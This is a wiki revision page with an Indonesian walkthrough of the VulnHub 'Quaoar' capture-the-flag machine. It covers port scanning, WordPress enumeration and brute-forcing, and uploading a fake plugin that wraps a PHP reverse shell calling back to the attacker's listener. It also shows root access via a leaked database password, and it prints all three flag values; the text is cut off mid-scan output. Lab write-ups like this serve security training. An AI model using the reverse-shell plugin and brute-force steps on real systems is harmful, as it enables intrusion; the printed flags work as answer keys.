Difference between revisions of "CTF Quaoar: Walkthrough"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(24 intermediate revisions by the same user not shown) | |||
Line 2: | Line 2: | ||
* https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download | * https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download | ||
− | * Install OVA di | + | * Install OVA di VirtualBox |
* Jalankan, ada clue di page depan Quaoar saat jalan. | * Jalankan, ada clue di page depan Quaoar saat jalan. | ||
* Difficulty Level: Very Easy | * Difficulty Level: Very Easy | ||
+ | |||
+ | Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra + Your Brain Coffee Google 🙂 | ||
+ | |||
+ | Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine | ||
+ | # Get a shell | ||
+ | # Get root access | ||
+ | # There is a post exploitation flag on the box | ||
+ | |||
+ | |||
==Cek Mesin== | ==Cek Mesin== | ||
Line 19: | Line 28: | ||
----------------------------------------------------------------------------- | ----------------------------------------------------------------------------- | ||
..... | ..... | ||
− | 192.168.0.122 08:00:27:b2:18:3a 1 60 PCS Systemtechnik GmbH | + | 192.168.0.122 08:00:27:b2:18:3a 1 60 PCS Systemtechnik GmbH |
− | ..... | + | ...... |
Scan Quaoar | Scan Quaoar | ||
+ | sudo su | ||
nmap -v -A 192.168.0.122 | nmap -v -A 192.168.0.122 | ||
+ | nmap -p1-65535 -A -T4 -sS 192.168.0.122 | ||
+ | |||
− | Starting Nmap 7.92 ( https://nmap.org ) at 2023-01- | + | Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-26 20:28 EST |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
Nmap scan report for 192.168.0.122 | Nmap scan report for 192.168.0.122 | ||
− | Host is up (0. | + | Host is up (0.0011s latency). |
− | Not shown: | + | Not shown: 65526 closed tcp ports (reset) |
− | PORT STATE SERVICE | + | PORT STATE SERVICE VERSION |
− | 22/tcp open ssh | + | 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol |
+ | 2.0) | ||
| ssh-hostkey: | | ssh-hostkey: | ||
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | | 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | ||
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) | | 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) | ||
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) | |_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) | ||
− | 53/tcp open domain | + | 53/tcp open domain ISC BIND 9.8.1-P1 |
| dns-nsid: | | dns-nsid: | ||
|_ bind.version: 9.8.1-P1 | |_ bind.version: 9.8.1-P1 | ||
− | 80/tcp open http | + | 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |
+ | |_http-server-header: Apache/2.2.22 (Ubuntu) | ||
+ | |_http-title: Site doesn't have a title (text/html). | ||
| http-robots.txt: 1 disallowed entry | | http-robots.txt: 1 disallowed entry | ||
|_Hackers | |_Hackers | ||
− | |||
− | |||
− | |||
− | |||
110/tcp open pop3? | 110/tcp open pop3? | ||
− | |_pop3-capabilities: RESP-CODES | + | |_pop3-capabilities: RESP-CODES TOP UIDL SASL CAPA STLS PIPELINING |
− | |||
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | | | + | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. |
− | + | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) | |
− | 143/tcp open imap | + | 143/tcp open imap Dovecot imapd |
+ | |_sslv2: ERROR: Script execution failed (use -d to debug) | ||
+ | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. | ||
+ | |_imap-capabilities: more STARTTLS ENABLE post-login LITERAL+ listed capabilities | ||
+ | Pre-login have IDLE ID OK LOGINDISABLEDA0001 SASL-IR IMAP4rev1 LOGIN-REFERRALS | ||
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | + | 445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP) | |
− | + | 993/tcp open ssl/imap Dovecot imapd | |
− | + | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. | |
− | 993/tcp open ssl/imap | ||
− | |_ssl-date: 2023-01- | ||
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | |||
− | |||
995/tcp open ssl/pop3s? | 995/tcp open ssl/pop3s? | ||
− | |_ssl-date: 2023-01- | + | |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. |
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | ||
− | |||
− | |||
− | |||
− | |||
| Not valid before: 2016-10-07T04:32:43 | | Not valid before: 2016-10-07T04:32:43 | ||
− | | | + | |_Not valid after: 2026-10-07T04:32:43 |
− | |||
− | |||
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC) | MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC) | ||
Device type: general purpose | Device type: general purpose | ||
Line 130: | Line 88: | ||
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 | OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 | ||
OS details: Linux 2.6.32 - 3.5 | OS details: Linux 2.6.32 - 3.5 | ||
− | |||
Network Distance: 1 hop | Network Distance: 1 hop | ||
− | + | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
− | + | ||
− | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | + | Host script results: |
+ | |_smb2-time: Protocol negotiation failed (SMB2) | ||
+ | |_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> | ||
+ | (unknown) | ||
+ | | smb-security-mode: | ||
+ | | account_used: guest | ||
+ | | authentication_level: user | ||
+ | | challenge_response: supported | ||
+ | |_ message_signing: disabled (dangerous, but default) | ||
+ | | smb-os-discovery: | ||
+ | | OS: Unix (Samba 3.6.3) | ||
+ | | NetBIOS computer name: | ||
+ | | Workgroup: WORKGROUP\x00 | ||
+ | |_ System time: 2023-01-26T20:31:31-05:00 | ||
+ | |_clock-skew: mean: 50m00s, deviation: 2h02m28s, median: 0s | ||
TRACEROUTE | TRACEROUTE | ||
HOP RTT ADDRESS | HOP RTT ADDRESS | ||
− | 1 | + | 1 1.06 ms 192.168.0.122 |
− | + | OS and Service detection performed. Please report any incorrect results at | |
− | + | https://nmap.org/submit/ . | |
− | + | Nmap done: 1 IP address (1 host up) scanned in 197.36 seconds | |
− | + | ||
− | + | ||
− | + | Service yang di temukan, | |
− | + | ||
− | + | Port Service Product | |
− | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | + | 22 ssh OpenSSH |
− | Nmap done: 1 IP address (1 host up) scanned in | + | 53 domain ISC BIND |
− | + | 80 http Apache httpd | |
+ | 110 pop3 | ||
+ | 139 netbios-ssn Samba smbd | ||
+ | 143 imap Dovecot imapd | ||
+ | 445 netbios-ssn Samba smbd | ||
+ | 993 imap Dovecot imapd | ||
+ | 995 pop3s | ||
+ | |||
+ | Beberapa informasi menarik dari berbagai servis | ||
+ | |||
+ | ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0 | ||
+ | domain bind.version: 9.8.1-P1 | ||
+ | http folder Hackers, robots.txt | ||
+ | pop3 dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA | ||
+ | netbios workgroup: WORKGROUP | ||
+ | imap post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS | ||
Tampaknya yang mungkin menarik untuk di exploit adalah port web 80. | Tampaknya yang mungkin menarik untuk di exploit adalah port web 80. | ||
− | ==Pakai dirb== | + | ==Berburu Flag 1: Web== |
+ | |||
+ | ===Pakai dirb=== | ||
Lakukan, | Lakukan, | ||
dirb http://192.168.0.122 | dirb http://192.168.0.122 | ||
+ | dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w | ||
Hasilnya | Hasilnya | ||
Line 648: | Line 637: | ||
DOWNLOADED: 258272 - FOUND: 252 | DOWNLOADED: 258272 - FOUND: 252 | ||
+ | Coba, | ||
+ | |||
+ | dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w | ||
+ | |||
+ | Hasilny tidak beda jauh dengan sebelumnya. | ||
+ | Sepertinya ada CMS (Lepton CMS) yang mengintai target ini. | ||
Disini bisa dilihat terdapat 3 file/folder penting yaitu | Disini bisa dilihat terdapat 3 file/folder penting yaitu | ||
Line 675: | Line 670: | ||
Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190. | Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190. | ||
+ | Tampaknya kita lebih baik focus ke wordpress saja. | ||
− | ==Wordpress Scanning== | + | ===Wordpress Scanning=== |
Scan Wordpress, | Scan Wordpress, | ||
Line 784: | Line 780: | ||
[+] Elapsed time: 00:00:05 | [+] Elapsed time: 00:00:05 | ||
− | ==Wordpress Bruteforce password== | + | |
+ | |||
+ | Yang di temukan, | ||
+ | |||
+ | What Fact | ||
+ | /readme.html WordPress version 3.9.14 | ||
+ | /wp-content/uploads/ Upload directory has directory listing enabled | ||
+ | |||
+ | Di temukan user, | ||
+ | |||
+ | Id Login Name | ||
+ | 1 admin admin | ||
+ | 2 wpuser wpuser | ||
+ | |||
+ | ===Wordpress Bruteforce password=== | ||
Coba bruteforce, | Coba bruteforce, | ||
Line 820: | Line 830: | ||
password admin | password admin | ||
− | ==Inject cmd vulnerability== | + | ===Inject cmd vulnerability=== |
Coba login ke | Coba login ke | ||
Line 900: | Line 910: | ||
uid=33(www-data) gid=33(www-data) groups=33(www-data) | uid=33(www-data) gid=33(www-data) groups=33(www-data) | ||
+ | ===Alternative Inject Fake Plugin=== | ||
+ | |||
+ | Di Kali Linux | ||
+ | |||
+ | cd ~ | ||
+ | cp /usr/share/webshells/php/php-reverse-shell.php ~/shelly.php | ||
+ | |||
+ | Beri plugin wrapper | ||
+ | |||
+ | <?php | ||
+ | |||
+ | /* | ||
+ | Plugin Name: Shelly | ||
+ | Plugin URI: http://localhost | ||
+ | Description: Bla Bla Bla | ||
+ | Author: Pingmoose | ||
+ | Version: 1.0.1 | ||
+ | Author URI: http://localhost | ||
+ | */ | ||
+ | |||
+ | COPY CONTENTS OF shelly.php HERE | ||
+ | |||
+ | ?> | ||
+ | |||
+ | |||
+ | Masuk ke shell Kali, cek IP address | ||
+ | |||
+ | ifconfig eth0 | ||
+ | |||
+ | Misalnya, IP address 192.168.0.94 | ||
+ | Edit shelly shell ubah, | ||
+ | |||
+ | $ip = '127.0.0.1'; // CHANGE THIS | ||
+ | $port = 1234; // CHANGE THIS | ||
+ | |||
+ | Menjadi | ||
+ | |||
+ | $ip = '192.168.0.94'; // CHANGE THIS | ||
+ | $port = 4444; // CHANGE THIS | ||
− | ==Start netcat listener di Kali== | + | |
+ | Zip, | ||
+ | |||
+ | zip shelly-plugin.zip shelly.php | ||
+ | mv shelly-plugin.zip /home/kali | ||
+ | chmod -Rf 777 /home/kali/shelly-plugin.zip | ||
+ | chown kali: /home/kali/shelly-plugin.zip | ||
+ | |||
+ | Masuk ke | ||
+ | |||
+ | http://192.168.0.122/wordpress/wp-admin/plugins.php | ||
+ | |||
+ | Upload, JANGAN di aktifkan | ||
+ | |||
+ | ===Start netcat listener di Kali=== | ||
Start 4444 listener | Start 4444 listener | ||
Line 907: | Line 970: | ||
nc -nvlp 4444 | nc -nvlp 4444 | ||
− | + | Aktifkan shelly shell | |
+ | |||
+ | http://192.168.0.122/wordpress/wp-content/plugins/shelly-plugin/shelly.php | ||
+ | |||
+ | Di kali linux CLI akan ada kata2, | ||
+ | |||
+ | nc -nvlp 4444 | ||
+ | listening on [any] 4444 ... | ||
+ | connect to [192.168.0.94] from (UNKNOWN) [192.168.0.122] 48071 | ||
+ | Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux | ||
+ | 21:23:43 up 1:10, 0 users, load average: 0.00, 0.01, 0.07 | ||
+ | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | ||
+ | uid=33(www-data) gid=33(www-data) groups=33(www-data) | ||
+ | /bin/sh: 0: can't access tty; job control turned off | ||
+ | $ | ||
+ | |||
+ | Akses shell yang lebih dalam, | ||
+ | |||
+ | $ whoami | ||
+ | www-data | ||
+ | $ whereis python | ||
+ | python: /usr/bin/python2.7 /usr/bin/python /etc/python2.7 /etc/python /usr/lib/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz | ||
+ | $ python -c 'import pty; pty.spawn("/bin/bash")' | ||
+ | www-data@Quaoar:/$ | ||
− | + | Dapatkan flag yang pertama, | |
− | |||
− | + | www-data@Quaoar:/$ cd /home | |
+ | cd /home | ||
+ | www-data@Quaoar:/home$ ls | ||
+ | ls | ||
+ | wpadmin | ||
+ | www-data@Quaoar:/home$ cat wpadmin | ||
+ | cat wpadmin | ||
+ | cat: wpadmin: Is a directory | ||
+ | www-data@Quaoar:/home$ cd wpadmin | ||
+ | cd wpadmin | ||
+ | www-data@Quaoar:/home/wpadmin$ ls | ||
+ | ls | ||
+ | flag.txt | ||
+ | www-data@Quaoar:/home/wpadmin$ cat flag.txt | ||
+ | cat flag.txt | ||
+ | 2bafe61f03117ac66a73c3c514de796e | ||
+ | www-data@Quaoar:/home/wpadmin$ | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
+ | ==Berburu Flag 2: Root== | ||
+ | Cek, | ||
+ | |||
+ | cd / | ||
+ | find / -perm -4000 -user root 2> /dev/null | ||
+ | |||
+ | Tampaknya tidak ada yang terlalu menarik. | ||
+ | Cek wp-config.php, | ||
+ | |||
+ | cat /var/www/wordpress/wp-config.php | ||
+ | |||
+ | Hasilnya, | ||
+ | |||
+ | ..... | ||
+ | /** The name of the database for WordPress */ | ||
+ | define('DB_NAME', 'wordpress'); | ||
+ | |||
+ | /** MySQL database username */ | ||
+ | define('DB_USER', 'root'); | ||
+ | |||
+ | /** MySQL database password */ | ||
+ | define('DB_PASSWORD', 'rootpassword!'); | ||
+ | |||
+ | /** MySQL hostname */ | ||
+ | define('DB_HOST', 'localhost'); | ||
+ | |||
+ | /** Database Charset to use in creating database tables. */ | ||
+ | define('DB_CHARSET', 'utf8'); | ||
+ | |||
+ | /** The Database Collate type. Don't change this if in doubt. */ | ||
+ | define('DB_COLLATE', ''); | ||
+ | ..... | ||
+ | |||
+ | DB_PASSWORD rootpassword! - Keren! | ||
+ | Jajal, | ||
+ | ww-data@Quaoar:/$ su | ||
+ | su | ||
+ | Password: rootpassword! | ||
+ | root@Quaoar:/# | ||
+ | |||
+ | Masuk :) .. | ||
+ | Root Flag | ||
+ | |||
+ | root@Quaoar:/# cd /root | ||
+ | cd /root | ||
+ | root@Quaoar:~# ls -al | ||
+ | ls -al | ||
+ | total 48 | ||
+ | drwx------ 6 root root 4096 Nov 30 2016 . | ||
+ | drwxr-xr-x 22 root root 4096 Oct 7 2016 .. | ||
+ | drwx------ 2 root root 4096 Oct 7 2016 .aptitude | ||
+ | -rw------- 1 root root 410 Jan 24 04:38 .bash_history | ||
+ | -rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc | ||
+ | drwx------ 2 root root 4096 Oct 15 2016 .cache | ||
+ | ---------- 1 root root 33 Oct 22 2016 flag.txt | ||
+ | -rw-r--r-- 1 root root 140 Apr 19 2012 .profile | ||
+ | drwx------ 2 root root 4096 Oct 26 2016 .ssh | ||
+ | -rw------- 1 root root 4740 Nov 30 2016 .viminfo | ||
+ | drwxr-xr-x 8 root root 4096 Jan 29 2015 vmware-tools-distrib | ||
+ | root@Quaoar:~# cat flag.txt | ||
+ | cat flag.txt | ||
+ | 8e3f9ec016e3598c5eec11fd3d73f6fb | ||
+ | root@Quaoar:~# | ||
+ | Flag root adalah | ||
− | + | 8e3f9ec016e3598c5eec11fd3d73f6fb | |
− | + | ==Berburu Flag 3: Root== | |
− | |||
− | |||
− | |||
− | + | Cek /etc | |
− | + | Tampaknya /etc/cron.d/php5 menarik, | |
− | + | Lakukan, | |
− | + | root@Quaoar:~# cd /etc | |
− | + | cd /etc | |
− | + | root@Quaoar:/etc# ls *cron* | |
− | + | ls *cron* | |
− | + | crontab | |
− | + | ||
+ | cron.d: | ||
+ | php5 | ||
+ | |||
+ | cron.daily: | ||
+ | apache2 bsdmainutils man-db samba | ||
+ | apport dpkg mlocate standard | ||
+ | apt libvirt-bin passwd tomcat6 | ||
+ | aptitude logrotate popularity-contest update-notifier-common | ||
+ | |||
+ | cron.hourly: | ||
+ | |||
+ | cron.monthly: | ||
+ | |||
+ | cron.weekly: | ||
+ | apt-xapian-index man-db | ||
+ | root@Quaoar:/etc# cat cron.d/php5 | ||
+ | cat cron.d/php5 | ||
+ | # /etc/cron.d/php5: crontab fragment for php5 | ||
+ | # This purges session files older than X, where X is defined in seconds | ||
+ | # as the largest value of session.gc_maxlifetime from all your php.ini | ||
+ | # files, or 24 minutes if not defined. See /usr/lib/php5/maxlifetime | ||
+ | # Its always a good idea to check for crontab to learn more about the operating | ||
+ | system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de | ||
+ | # Look for and purge old sessions every 30 minutes | ||
+ | 09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] && [ -d | ||
+ | /var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete | ||
+ | root@Quaoar:/etc# | ||
+ | Flag Root adalah, | ||
− | + | d46795f84148fd338603d0d6a9dbf8de | |
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | + | ==Beberapa Catatan Percobaan Sebelumnya== | |
− | ==Privilege Escalation (getting root)== | + | ==Percobaan Privilege Escalation (getting root)== |
cara-cara di atas semua tidak berhasil. | cara-cara di atas semua tidak berhasil. |
Latest revision as of 20:53, 21 August 2023
Ambil Quaoar dari Vulnhub
- https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download
- Install OVA di VirtualBox
- Jalankan, ada clue di page depan Quaoar saat jalan.
- Difficulty Level: Very Easy
Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra + Your Brain Coffee Google 🙂
Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine
- Get a shell
- Get root access
- There is a post exploitation flag on the box
Cek Mesin
Gunakan
netdiscover -r 192.168.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts 21 Captured ARP Req/Rep packets, from 20 hosts. Total size: 1260 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- ..... 192.168.0.122 08:00:27:b2:18:3a 1 60 PCS Systemtechnik GmbH ......
Scan Quaoar
sudo su nmap -v -A 192.168.0.122 nmap -p1-65535 -A -T4 -sS 192.168.0.122
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-26 20:28 EST Nmap scan report for 192.168.0.122 Host is up (0.0011s latency). Not shown: 65526 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) |_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) 53/tcp open domain ISC BIND 9.8.1-P1 | dns-nsid: |_ bind.version: 9.8.1-P1 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | http-robots.txt: 1 disallowed entry |_Hackers 110/tcp open pop3? |_pop3-capabilities: RESP-CODES TOP UIDL SASL CAPA STLS PIPELINING | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_sslv2: ERROR: Script execution failed (use -d to debug) |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. |_imap-capabilities: more STARTTLS ENABLE post-login LITERAL+ listed capabilities Pre-login have IDLE ID OK LOGINDISABLEDA0001 SASL-IR IMAP4rev1 LOGIN-REFERRALS | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 995/tcp open ssl/pop3s? |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X|3.X OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 OS details: Linux 2.6.32 - 3.5 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_smb2-time: Protocol negotiation failed (SMB2) |_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Unix (Samba 3.6.3) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2023-01-26T20:31:31-05:00 |_clock-skew: mean: 50m00s, deviation: 2h02m28s, median: 0s TRACEROUTE HOP RTT ADDRESS 1 1.06 ms 192.168.0.122 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 197.36 seconds
Service yang di temukan,
Port Service Product 22 ssh OpenSSH 53 domain ISC BIND 80 http Apache httpd 110 pop3 139 netbios-ssn Samba smbd 143 imap Dovecot imapd 445 netbios-ssn Samba smbd 993 imap Dovecot imapd 995 pop3s
Beberapa informasi menarik dari berbagai servis
ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0 domain bind.version: 9.8.1-P1 http folder Hackers, robots.txt pop3 dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA netbios workgroup: WORKGROUP imap post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS
Tampaknya yang mungkin menarik untuk di exploit adalah port web 80.
Berburu Flag 1: Web
Pakai dirb
Lakukan,
dirb http://192.168.0.122 dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
Hasilnya
----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Jan 23 21:31:24 2023 URL_BASE: http://192.168.0.122/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.0.122/ ---- + http://192.168.0.122/cgi-bin/ (CODE:403|SIZE:289) + http://192.168.0.122/hacking (CODE:200|SIZE:616848) + http://192.168.0.122/index (CODE:200|SIZE:100) + http://192.168.0.122/index.html (CODE:200|SIZE:100) + http://192.168.0.122/LICENSE (CODE:200|SIZE:1672) + http://192.168.0.122/robots (CODE:200|SIZE:271) + http://192.168.0.122/robots.txt (CODE:200|SIZE:271) + http://192.168.0.122/server-status (CODE:403|SIZE:294) ==> DIRECTORY: http://192.168.0.122/upload/ ==> DIRECTORY: http://192.168.0.122/wordpress/ ---- Entering directory: http://192.168.0.122/upload/ ---- ==> DIRECTORY: http://192.168.0.122/upload/account/ ==> DIRECTORY: http://192.168.0.122/upload/admins/ + http://192.168.0.122/upload/config (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/framework/ ==> DIRECTORY: http://192.168.0.122/upload/include/ + http://192.168.0.122/upload/index (CODE:200|SIZE:3040) + http://192.168.0.122/upload/index.php (CODE:200|SIZE:3040) ==> DIRECTORY: http://192.168.0.122/upload/languages/ ==> DIRECTORY: http://192.168.0.122/upload/media/ ==> DIRECTORY: http://192.168.0.122/upload/modules/ ==> DIRECTORY: http://192.168.0.122/upload/page/ ==> DIRECTORY: http://192.168.0.122/upload/search/ ==> DIRECTORY: http://192.168.0.122/upload/temp/ ==> DIRECTORY: http://192.168.0.122/upload/templates/ ---- Entering directory: http://192.168.0.122/wordpress/ ---- ==> DIRECTORY: http://192.168.0.122/wordpress/index/ + http://192.168.0.122/wordpress/index.php (CODE:301|SIZE:0) + http://192.168.0.122/wordpress/license (CODE:200|SIZE:19930) + http://192.168.0.122/wordpress/readme (CODE:200|SIZE:7195) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/ + http://192.168.0.122/wordpress/wp-blog-header (CODE:200|SIZE:0) + http://192.168.0.122/wordpress/wp-config (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/ + http://192.168.0.122/wordpress/wp-cron (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-includes/ + http://192.168.0.122/wordpress/wp-links-opml (CODE:200|SIZE:217) + http://192.168.0.122/wordpress/wp-load (CODE:200|SIZE:0) + http://192.168.0.122/wordpress/wp-login (CODE:200|SIZE:2530) + http://192.168.0.122/wordpress/wp-mail (CODE:500|SIZE:3011) + http://192.168.0.122/wordpress/wp-settings (CODE:500|SIZE:0) + http://192.168.0.122/wordpress/wp-signup (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-trackback (CODE:200|SIZE:135) + http://192.168.0.122/wordpress/xmlrpc (CODE:200|SIZE:42) + http://192.168.0.122/wordpress/xmlrpc.php (CODE:200|SIZE:42) ---- Entering directory: http://192.168.0.122/upload/account/ ---- ==> DIRECTORY: http://192.168.0.122/upload/account/css/ + http://192.168.0.122/upload/account/forgot (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/login (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/logout (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/preferences (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/signup (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/account/templates/ ---- Entering directory: http://192.168.0.122/upload/admins/ ---- ==> DIRECTORY: http://192.168.0.122/upload/admins/access/ ==> DIRECTORY: http://192.168.0.122/upload/admins/addons/ ==> DIRECTORY: http://192.168.0.122/upload/admins/admintools/ ==> DIRECTORY: http://192.168.0.122/upload/admins/groups/ + http://192.168.0.122/upload/admins/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/admins/interface/ ==> DIRECTORY: http://192.168.0.122/upload/admins/languages/ ==> DIRECTORY: http://192.168.0.122/upload/admins/login/ ==> DIRECTORY: http://192.168.0.122/upload/admins/logout/ ==> DIRECTORY: 